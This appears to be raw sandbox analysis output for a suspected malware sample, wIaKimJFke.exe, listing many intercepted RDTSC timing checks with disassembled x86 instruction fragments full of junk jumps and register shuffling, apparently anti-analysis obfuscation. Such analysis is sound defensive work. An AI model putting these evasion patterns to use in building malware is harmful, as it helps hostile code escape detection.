Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E90444 second address: 4E904A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, cx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebp+08h] 0x0000000d pushad 0x0000000e mov ebx, ecx 0x00000010 call 00007FED74F3E522h 0x00000015 pushfd 0x00000016 jmp 00007FED74F3E522h 0x0000001b or al, 00000028h 0x0000001e jmp 00007FED74F3E51Bh 0x00000023 popfd 0x00000024 pop ecx 0x00000025 popad 0x00000026 and dword ptr [eax], 00000000h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FED74F3E522h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70532 second address: 4E70538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70538 second address: 4E7053C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E7053C second address: 4E705AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FED7550886Fh 0x00000013 add eax, 61456E6Eh 0x00000019 jmp 00007FED75508879h 0x0000001e popfd 0x0000001f mov bl, al 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 jmp 00007FED75508873h 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FED75508875h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E705AF second address: 4E705B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E705B5 second address: 4E705B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E80EB1 second address: 4E80EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E524h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E80EC9 second address: 4E80F29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FED75508876h 0x00000011 push eax 0x00000012 jmp 00007FED7550886Bh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FED75508876h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007FED7550886Dh 0x00000027 mov ch, 8Eh 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E901E6 second address: 4E901EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E901EA second address: 4E90207 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E90207 second address: 4E90272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FED74F3E527h 0x00000009 adc cx, CB6Eh 0x0000000e jmp 00007FED74F3E529h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b mov edi, esi 0x0000001d jmp 00007FED74F3E526h 0x00000022 popad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FED74F3E51Eh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E90272 second address: 4E90277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E90277 second address: 4E90289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, 2392h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E90289 second address: 4E9028D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E9028D second address: 4E90293 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E90293 second address: 4E90299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB06DA second address: 4EB06DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB06DE second address: 4EB06E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB06E4 second address: 4EB07CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FED74F3E51Eh 0x00000011 add ax, 0238h 0x00000016 jmp 00007FED74F3E51Bh 0x0000001b popfd 0x0000001c push eax 0x0000001d mov ebx, 29FE7A5Ah 0x00000022 pop edi 0x00000023 popad 0x00000024 push eax 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FED74F3E527h 0x0000002c jmp 00007FED74F3E523h 0x00000031 popfd 0x00000032 jmp 00007FED74F3E528h 0x00000037 popad 0x00000038 xchg eax, ecx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FED74F3E51Eh 0x00000040 or si, 0158h 0x00000045 jmp 00007FED74F3E51Bh 0x0000004a popfd 0x0000004b popad 0x0000004c mov eax, dword ptr [76FB65FCh] 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 call 00007FED74F3E51Eh 0x00000059 pop ecx 0x0000005a pushfd 0x0000005b jmp 00007FED74F3E51Bh 0x00000060 add cx, 4CCEh 0x00000065 jmp 00007FED74F3E529h 0x0000006a popfd 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB07CD second address: 4EB0842 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, F1E2h 0x00000007 call 00007FED75508873h 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 test eax, eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FED75508870h 0x0000001b sub cx, A7A8h 0x00000020 jmp 00007FED7550886Bh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007FED75508878h 0x0000002c jmp 00007FED75508875h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB0842 second address: 4EB0848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB0848 second address: 4EB084C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB084C second address: 4EB08EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FEDE6FC1628h 0x0000000e jmp 00007FED74F3E51Fh 0x00000013 mov ecx, eax 0x00000015 jmp 00007FED74F3E526h 0x0000001a xor eax, dword ptr [ebp+08h] 0x0000001d jmp 00007FED74F3E521h 0x00000022 and ecx, 1Fh 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FED74F3E51Ch 0x0000002c jmp 00007FED74F3E525h 0x00000031 popfd 0x00000032 mov edi, esi 0x00000034 popad 0x00000035 ror eax, cl 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FED74F3E51Fh 0x00000040 jmp 00007FED74F3E523h 0x00000045 popfd 0x00000046 pushad 0x00000047 popad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB08EB second address: 4EB08F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB08F1 second address: 4EB08F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB08F5 second address: 4EB0945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c jmp 00007FED7550886Eh 0x00000011 retn 0004h 0x00000014 nop 0x00000015 mov esi, eax 0x00000017 lea eax, dword ptr [ebp-08h] 0x0000001a xor esi, dword ptr [00541014h] 0x00000020 push eax 0x00000021 push eax 0x00000022 push eax 0x00000023 lea eax, dword ptr [ebp-10h] 0x00000026 push eax 0x00000027 call 00007FED79EB9764h 0x0000002c push FFFFFFFEh 0x0000002e pushad 0x0000002f pushad 0x00000030 push ecx 0x00000031 pop ebx 0x00000032 mov esi, 02C753BFh 0x00000037 popad 0x00000038 mov edx, eax 0x0000003a popad 0x0000003b pop eax 0x0000003c jmp 00007FED7550886Eh 0x00000041 ret 0x00000042 nop 0x00000043 push eax 0x00000044 call 00007FED79EB977Ch 0x00000049 mov edi, edi 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB0945 second address: 4EB0949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB0949 second address: 4EB094D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB094D second address: 4EB0953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB0953 second address: 4EB09A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED75508870h 0x0000000f push eax 0x00000010 jmp 00007FED7550886Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FED75508875h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB09A0 second address: 4EB09C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FED74F3E527h 0x00000008 pop esi 0x00000009 mov cx, di 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB09C9 second address: 4EB09CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB09CD second address: 4EB09D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB09D1 second address: 4EB09D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB09D7 second address: 4EB09DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB09DD second address: 4EB09E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB09E1 second address: 4EB09FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB09FF second address: 4EB0A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB0A03 second address: 4EB0A16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB0A16 second address: 4EB0A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED75508874h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB0A2E second address: 4EB0A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60011 second address: 4E60021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED7550886Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60021 second address: 4E60025 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60025 second address: 4E60058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007FED7550886Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007FED75508870h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b movsx edx, ax 0x0000001e mov cl, 52h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60058 second address: 4E60073 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E527h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60073 second address: 4E600CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FED7550886Eh 0x00000012 sbb ecx, 04A10E08h 0x00000018 jmp 00007FED7550886Bh 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ecx 0x00000020 jmp 00007FED75508876h 0x00000025 push eax 0x00000026 pushad 0x00000027 push edi 0x00000028 mov edi, esi 0x0000002a pop esi 0x0000002b mov esi, edx 0x0000002d popad 0x0000002e xchg eax, ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov edx, ecx 0x00000034 mov ah, B5h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E600CA second address: 4E600D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E600D0 second address: 4E600EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov al, dl 0x0000000e call 00007FED7550886Eh 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E600EE second address: 4E60109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E520h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60109 second address: 4E6010D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E6010D second address: 4E60129 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60129 second address: 4E60174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FED75508876h 0x0000000f mov ebx, dword ptr [ebp+10h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FED7550886Dh 0x0000001a call 00007FED75508870h 0x0000001f pop esi 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60174 second address: 4E601AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E520h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FED74F3E520h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FED74F3E51Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E601AA second address: 4E601DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FED75508876h 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ecx, edx 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E601DB second address: 4E60217 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 pushfd 0x00000007 jmp 00007FED74F3E527h 0x0000000c jmp 00007FED74F3E523h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60217 second address: 4E60232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508877h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60232 second address: 4E6025E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FED74F3E51Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E6025E second address: 4E60280 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 jmp 00007FED7550886Dh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov eax, edx 0x00000014 mov ebx, 3E95653Ah 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60280 second address: 4E60304 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E520h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007FED74F3E520h 0x00000010 je 00007FEDE700C885h 0x00000016 jmp 00007FED74F3E520h 0x0000001b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000022 jmp 00007FED74F3E520h 0x00000027 je 00007FEDE700C86Eh 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FED74F3E51Dh 0x00000036 xor ax, 2476h 0x0000003b jmp 00007FED74F3E521h 0x00000040 popfd 0x00000041 mov ebx, ecx 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60304 second address: 4E60320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED75508878h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60320 second address: 4E603C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b jmp 00007FED74F3E527h 0x00000010 or edx, dword ptr [ebp+0Ch] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FED74F3E524h 0x0000001a and esi, 297AAE58h 0x00000020 jmp 00007FED74F3E51Bh 0x00000025 popfd 0x00000026 mov edi, esi 0x00000028 popad 0x00000029 test edx, 61000000h 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FED74F3E520h 0x00000036 sbb esi, 7C6C38B8h 0x0000003c jmp 00007FED74F3E51Bh 0x00000041 popfd 0x00000042 jmp 00007FED74F3E528h 0x00000047 popad 0x00000048 jne 00007FEDE700C7EBh 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 push ebx 0x00000052 pop ecx 0x00000053 movsx edi, cx 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E603C2 second address: 4E603D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED7550886Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E603D4 second address: 4E6043B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [esi+48h], 00000001h 0x0000000c pushad 0x0000000d call 00007FED74F3E51Dh 0x00000012 pushfd 0x00000013 jmp 00007FED74F3E520h 0x00000018 add ecx, 7E9CF7D8h 0x0000001e jmp 00007FED74F3E51Bh 0x00000023 popfd 0x00000024 pop esi 0x00000025 jmp 00007FED74F3E529h 0x0000002a popad 0x0000002b jne 00007FEDE700C78Bh 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov edx, 66E7774Eh 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E6043B second address: 4E60441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60441 second address: 4E60445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60445 second address: 4E60456 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test bl, 00000007h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60456 second address: 4E60468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60468 second address: 4E6047A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED7550886Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E6047A second address: 4E6047E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50884 second address: 4E508A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 9Ch 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FED7550886Dh 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 movsx edi, si 0x00000014 popad 0x00000015 and esp, FFFFFFF8h 0x00000018 pushad 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E508A8 second address: 4E508CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push ebx 0x00000007 jmp 00007FED74F3E524h 0x0000000c mov dword ptr [esp], ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E508CC second address: 4E508E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
